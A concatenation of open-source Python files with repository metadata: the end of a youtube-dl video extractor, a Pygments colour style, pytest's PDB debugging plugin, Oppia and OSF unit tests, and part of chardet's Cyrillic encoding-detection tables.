for video_url in re.findall(r'<(?:source|video) src="([^"]+)"', webpage):
video_ext = determine_ext(video_url)
formats.append({
'url': video_url,
'format_id': video_ext,
'quality': quality(video_ext),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'age_limit': 18,
}
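# Usage sketch (standard youtube-dl embedding API; the URL matches _TEST):
#   from youtube_dl import YoutubeDL
#   ydl = YoutubeDL()
#   info = ydl.extract_info('http://www.sunporno.com/videos/807778/',
#                           download=False)
#   print(info['title'], info['duration'])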
|
gpl-2.0
|
adrian-zumbler/IdealNews
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/styles/colorful.py
|
364
|
2778
|
# -*- coding: utf-8 -*-
"""
pygments.styles.colorful
~~~~~~~~~~~~~~~~~~~~~~~~
A colorful style, inspired by CodeRay.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class ColorfulStyle(Style):
"""
A colorful style, inspired by CodeRay.
"""
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "#888",
Comment.Preproc: "#579",
Comment.Special: "bold #cc0000",
Keyword: "bold #080",
Keyword.Pseudo: "#038",
Keyword.Type: "#339",
Operator: "#333",
Operator.Word: "bold #000",
Name.Builtin: "#007020",
Name.Function: "bold #06B",
Name.Class: "bold #B06",
Name.Namespace: "bold #0e84b5",
Name.Exception: "bold #F00",
Name.Variable: "#963",
Name.Variable.Instance: "#33B",
Name.Variable.Class: "#369",
Name.Variable.Global: "bold #d70",
Name.Constant: "bold #036",
Name.Label: "bold #970",
Name.Entity: "bold #800",
Name.Attribute: "#00C",
Name.Tag: "#070",
Name.Decorator: "bold #555",
String: "bg:#fff0f0",
String.Char: "#04D bg:",
String.Doc: "#D42 bg:",
String.Interpol: "bg:#eee",
String.Escape: "bold #666",
String.Regex: "bg:#fff0ff #000",
String.Symbol: "#A60 bg:",
String.Other: "#D20",
Number: "bold #60E",
Number.Integer: "bold #00D",
Number.Float: "bold #60E",
Number.Hex: "bold #058",
Number.Oct: "bold #40E",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #c65d09",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "#F00 bg:#FAA"
}
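# Usage sketch (standard Pygments API; input source is illustrative):
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   from pygments.formatters import HtmlFormatter
#   html = highlight('print 1', PythonLexer(),
#                    HtmlFormatter(style=ColorfulStyle))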
|
mit
|
Haibo-Wang-ORG/pytest
|
_pytest/pdb.py
|
27
|
3415
|
""" interactive debugging with PDB, the Python Debugger. """
from __future__ import absolute_import
import pdb
import sys
import pytest
def pytest_addoption(parser):
group = parser.getgroup("general")
group._addoption('--pdb',
action="store_true", dest="usepdb", default=False,
help="start the interactive Python debugger on errors.")
def pytest_namespace():
return {'set_trace': pytestPDB().set_trace}
def pytest_configure(config):
if config.getvalue("usepdb"):
config.pluginmanager.register(PdbInvoke(), 'pdbinvoke')
old = (pdb.set_trace, pytestPDB._pluginmanager)
def fin():
pdb.set_trace, pytestPDB._pluginmanager = old
pytestPDB._config = None
pdb.set_trace = pytest.set_trace
pytestPDB._pluginmanager = config.pluginmanager
pytestPDB._config = config
config._cleanup.append(fin)
class pytestPDB:
""" Pseudo PDB that defers to the real pdb. """
_pluginmanager = None
_config = None
def set_trace(self):
""" invoke PDB set_trace debugging, dropping any IO capturing. """
import _pytest.config
frame = sys._getframe().f_back
capman = None
if self._pluginmanager is not None:
capman = self._pluginmanager.getplugin("capturemanager")
if capman:
capman.suspendcapture(in_=True)
tw = _pytest.config.create_terminal_writer(self._config)
tw.line()
tw.sep(">", "PDB set_trace (IO-capturing turned off)")
self._pluginmanager.hook.pytest_enter_pdb()
pdb.Pdb().set_trace(frame)
class PdbInvoke:
def pytest_exception_interact(self, node, call, report):
capman = node.config.pluginmanager.getplugin("capturemanager")
if capman:
capman.suspendcapture(in_=True)
_enter_pdb(node, call.excinfo, report)
def pytest_internalerror(self, excrepr, excinfo):
for line in str(excrepr).split("\n"):
sys.stderr.write("INTERNALERROR> %s\n" % line)
sys.stderr.flush()
tb = _postmortem_traceback(excinfo)
post_mortem(tb)
def _enter_pdb(node, excinfo, rep):
# XXX we re-use the TerminalReporter's terminalwriter
# because this seems to avoid some encoding related troubles
# for not completely clear reasons.
tw = node.config.pluginmanager.getplugin("terminalreporter")._tw
tw.line()
tw.sep(">", "traceback")
rep.toterminal(tw)
tw.sep(">", "entering PDB")
tb = _postmortem_traceback(excinfo)
post_mortem(tb)
rep._pdbshown = True
return rep
def _postmortem_traceback(excinfo):
# A doctest.UnexpectedException is not useful for post_mortem.
# Use the underlying exception instead:
from doctest import UnexpectedException
if isinstance(excinfo.value, UnexpectedException):
return excinfo.value.exc_info[2]
else:
return excinfo._excinfo[2]
def _find_last_non_hidden_frame(stack):
i = max(0, len(stack) - 1)
while i and stack[i][0].f_locals.get("__tracebackhide__", False):
i -= 1
return i
def post_mortem(t):
class Pdb(pdb.Pdb):
def get_stack(self, f, t):
stack, i = pdb.Pdb.get_stack(self, f, t)
if f is None:
i = _find_last_non_hidden_frame(stack)
return stack, i
p = Pdb()
p.reset()
p.interaction(None, t)
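# Usage sketch: a test can call pytest.set_trace() to enter PDB with IO
# capturing suspended, and `py.test --pdb` registers PdbInvoke so failures
# open a post-mortem session at the last non-hidden frame, e.g.
#   def test_debug_me():
#       pytest.set_trace()  # capturing is turned off before the prompt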
|
mit
|
Atlas-Sailed-Co/oppia
|
core/domain/gadget_registry_test.py
|
24
|
1686
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for methods in gadget registry."""
__author__ = 'Michael Anuzis'
import os
from core.domain import gadget_registry
from core.tests import test_utils
from extensions.gadgets import base
import feconf
class GadgetRegistryUnitTests(test_utils.GenericTestBase):
"""Test for the gadget registry."""
def test_allowed_gadgets_and_counts(self):
"""Do sanity checks on the ALLOWED_GADGETS dict in feconf.py."""
self.assertEqual(
len(gadget_registry.Registry.get_all_gadgets()),
len(feconf.ALLOWED_GADGETS))
for (gadget_name, gadget_definition) in (
feconf.ALLOWED_GADGETS.iteritems()):
contents = os.listdir(
os.path.join(os.getcwd(), gadget_definition['dir']))
self.assertIn('%s.py' % gadget_name, contents)
def test_get_all_specs(self):
"""Test the get_all_specs() method."""
specs_dict = gadget_registry.Registry.get_all_specs()
self.assertEqual(
len(specs_dict.keys()), len(feconf.ALLOWED_GADGETS))
|
apache-2.0
|
Ghalko/osf.io
|
tests/test_permissions.py
|
58
|
1302
|
# -*- coding: utf-8 -*-
"""Tests for the permissions module."""
import unittest
from nose.tools import * # PEP8 asserts
from website.util import permissions
def test_expand_permissions():
result = permissions.expand_permissions('admin')
assert_equal(result, ['read', 'write', 'admin'])
result2 = permissions.expand_permissions('write')
assert_equal(result2, ['read', 'write'])
result3 = permissions.expand_permissions(None)
assert_equal(result3, [])
def test_reduce_permissions():
result = permissions.reduce_permissions(['read', 'write', 'admin'])
assert_equal(result, 'admin')
result2 = permissions.reduce_permissions(['read', 'write'])
assert_equal(result2, 'write')
result3 = permissions.reduce_permissions(['read'])
assert_equal(result3, 'read')
def test_reduce_permissions_with_empty_list_raises_error():
with assert_raises(ValueError):
permissions.reduce_permissions([])
def test_reduce_permissions_with_unknown_permission_raises_error():
with assert_raises(ValueError):
permissions.reduce_permissions(['unknownpermission'])
def test_default_contributor_permissions():
assert_equal(permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS,
['read', 'write'])
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
julien78910/CouchPotatoServer
|
libs/chardet/langcyrillicmodel.py
|
2762
|
17725
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
